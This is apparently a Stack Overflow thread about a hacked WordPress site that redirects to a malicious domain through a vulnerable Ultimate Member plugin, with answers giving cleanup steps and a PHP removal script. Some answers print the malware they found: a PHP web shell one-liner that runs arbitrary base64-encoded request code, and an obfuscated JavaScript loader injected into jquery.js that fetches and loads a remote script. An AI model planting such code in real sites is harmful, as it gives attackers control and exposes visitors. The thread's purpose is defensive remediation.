Wordpress Site always redirects to yetill.com

Question

Anyone who can help me how to fix my site? It is always redirecting to yetill.com. I searched about this site and i learned that it is a kind of malware. Tried various solutions found on the net but still not solved.

Thanks.

You restore everything from backups and possibly do a diff between that and the current state to see what was changed if you want to know. But backups are the way to go and then fix the site to not allow this to happen again. — Sami Kuhmonen, Aug 14 '18 at 05:46
You don’t *have to*, as long as you remove everything, restore a backup, and make sure all permissions and updates are in order if this is someone from outside doing this. — Sami Kuhmonen, Aug 14 '18 at 05:57
install this plugin in admin https://wordpress.org/plugins/wordfence/ and scan the site and if not then re-upload the backup if you have and if not first re-upload the wp-admin and wp-include (note: make sure you upload correct version) and then rename the plugin folder name and try to find the malicious code from your theme. — Aakanksh Patel, Aug 14 '18 at 05:59

score 2 · Answer 1 · edited Aug 14 '18 at 11:02

Preliminary steps:

Backup everything
Check the file wp-includes/js/jquery/jquery.js - the first line should only contain a comment like /*! jQuery v1.... Delete anything before that line (you made a backup, right?)
Check your /wp-content/uploads directory for suspicious files. For us it was we had malicious files e.g. in this sub dir: /ultimatemember/temp/[random dir]/n.php - Delete those after making a backup.
Install WordFence WP plugin and scan your site
Double-check that wp-includes/js/jquery/jquery.js is still OK (it can be modified again)
Consider the WordFence option "Disable Code Execution for Uploads directory" to prevent future intrusions if that works for your site (test!).

Background:

We have the same problem. Wordfence noticed that the file wp-includes/js/jquery/jquery.js was modified on the server. Restoring it to the original version seemed to solve it. BUT, the file got infected quickly (hours?). So we do not know the source yet...

We found some suspicious code in /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:

<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>

That basically executes any PHP code from outside...

After deleting those files, the site did seemed back to normal (couple of hours).

We also noticed a suspicious <a> tag in the page source; but not sure about its relevance.

<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>

try to check the temp files inside 'wp-content/uploads/plugin/'. I had mine injected with malicious jquery function inside my jquery.js file. — iamsushi_j12n, Aug 14 '18 at 08:18
Found some suspicious stuff in /wp-content/uploads/ultimatemember/temp/ - deleted it. What was your path? — Markus Junginger, Aug 14 '18 at 08:44
try to install wordfence to your site, that'll be able to show the malicious codes injected :) — iamsushi_j12n, Aug 14 '18 at 10:12
We had wordfence installed. My question was rather if you also had the ultimatemember plugin installed, or if that was just coincidence. — Markus Junginger, Aug 14 '18 at 10:24
@Vivien did you update the Ultimate Member plugin to the newest version? They've (supposedly) patched the vulnerability. — Batfan, Aug 17 '18 at 15:56

score 1 · Answer 2 · answered Aug 14 '18 at 05:56

You will have to do some troubleshooting. It is either your theme or one of your plugins that contains the malicious code.

Follow these steps:

Switch to a default theme like TwentySeventeen - If the issue persists, it means it is not your theme.
Deactivate all your active plugins and check the website - The issue should go away.
Begin reactivating your plugins, clearing the cache after each reactivation and checking your website - Whenever the issue shows up again, it is that plugin that's the culprit and you cannot use that plugin.

Hope this helps.

shadowclover · Answer 3 · 2018-08-14T09:54:45.833

We have the same error, these files were infected. This is the malicious code I've found in them.

wp-includes/js/jquery/jquery.js

(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();

themes/yourtheme/header.php

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>

Can you elaboreate on your answer. Why are they "malicious"? How to fix it? Try to make your answer more usable for future readers. — franiis, Aug 14 '18 at 08:58
The code adds a js redirection to the header, we have not found the source of the problem yet. We are planning to export all our content and do a complete new installation of WP to get rid of any infected files. — shadowclover, Aug 14 '18 at 09:54

score 1 · Answer 4 · answered Aug 14 '18 at 09:11

1

jquery file was infected in my case. Just delete the code before /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */ and make sure that all of your plugins are updated and the site is secure. Also chech the permissions of the files! That helps me in my case

answered Aug 14 '18 at 09:11

Rosen

11
1

It will come back, check Vivien's answer. – Markus Junginger Aug 14 '18 at 10:22
Yes I found same problem that you said in ultimatemember folder. But where is the main problem. From where the injection comes.. – Rosen Aug 14 '18 at 10:46
This may be the main problem. – Markus Junginger Aug 14 '18 at 10:51

score 1 · Accepted Answer · answered Aug 14 '18 at 12:38

It seems that this is caused by the vulnerability of some plugins you might be using.

In my case it was the older version (prior to 2.22) of Ultimate Member plugin.

If you are using version 2.22 or earlier of this plugin, you should update this plugin immediately, and purge temp files. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)

After that, search recently updated files with this command. (e.g. 15 days)

find ./ -type f -mtime -15

Chances are your WP jquery file and any files with name "header" is likely to be infected.

/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..

Remove the following script in your infected header files.

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>

It looks like this is inserted right after opening head tag and right before closing head tag. Make sure you delete both.

Remove maliciously inserted script from infected Jquery file or just replace the file with clean one from other WP Core installations.

I think this should fix the issue.

score 0 · Answer 6 · edited Aug 14 '18 at 21:37

This is what I found today after running securi scanner. Hopefully this helps someone because this one is a nasty one. It appears in my case to be affecting the following files:

wp-admin/install.php
wp-includes/js/jquery/jquery.js
wp-includes/theme-compat/header-embed.php
wp-includes/theme-compat/header.php

Whatever it was seemed to have gone ham on my wp-includes directory. I do run Ultimate Member plugin and I noticed someone mentioned before that earlier versions of this plugin had vulnerabilities. I run a multi-site network, and also noticed that two of the registration forms on my sub-sites had the default role of Administrator (what plugin vendor would find that secure as a default registration option?) with the auto approve option enabled (no verification emails). Apparently activating this plugin in a network environment requires some extra thorough review on those registration and sign in forms.

Possible Infected Files

(If you have an additional question, please ask that as a separate question; it may be better on the WordPress or Webmasters sites, since it is not a programming question). — halfer, Aug 14 '18 at 21:39

score 0 · Answer 7 · answered Aug 15 '18 at 04:17

Had the same issue. jquery was infected and had to be replaced with the original version. The hacker probably used ultimatemember backdoor to upload a php file and execute it. I had to clean up the plugin temp directory.

Another observation was that the hack was forcing modified jquery to load script, which address was loaded from http://src.eeduelements.com/get.php . This gives them the flexibility to rotate the ads.

score 0 · Answer 8 · answered Aug 15 '18 at 04:36

sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"

that along with this answer below helped me clean my files. It affected all of my websites but now seems to still persist on the site that had ultimate member on it. Still working on it. This Php script was incredible though. thanks to the writer for sure.

PHP/SSH regex script/command to delete identical malware code from many files

This is the php from the above answer. I just swapped out the find portion with the malicious stuff redirecting to yetill.

    <?php
//Enter it as it is and escape any single quotes
$find='<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';

echo findString('./',$find);

function findString($path,$find){
    $return='';
    ob_start();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                if(is_dir($path.'/'.$file)){
                    $sub=findString($path.'/'.$file,$find);
                    if(isset($sub)){
                        echo $sub.PHP_EOL;
                    }
                }else{
                    $ext=substr(strtolower($file),-3);
                    if($ext=='php'){
                        $filesource=file_get_contents($path.'/'.$file);
                        $pos = strpos($filesource, $find);
                        if ($pos === false) {
                            continue;
                        } else {
                        //The cleaning bit
                        echo "The string '".htmlentities($find)."' was found in the file '$path/$file and exists at position $pos and has been removed from the source file.<br />";
                        $clean_source = str_replace($find,'',$filesource);
                        file_put_contents($path.'/'.$file,$clean_source);
                        }
                    }else{
                        continue;
                    }
                }
            }
        }
        closedir($handle);
    }
    $return = ob_get_contents();
    ob_end_clean();
    return $return;
}
?>

Wordpress Site always redirects to yetill.com

8 Answers8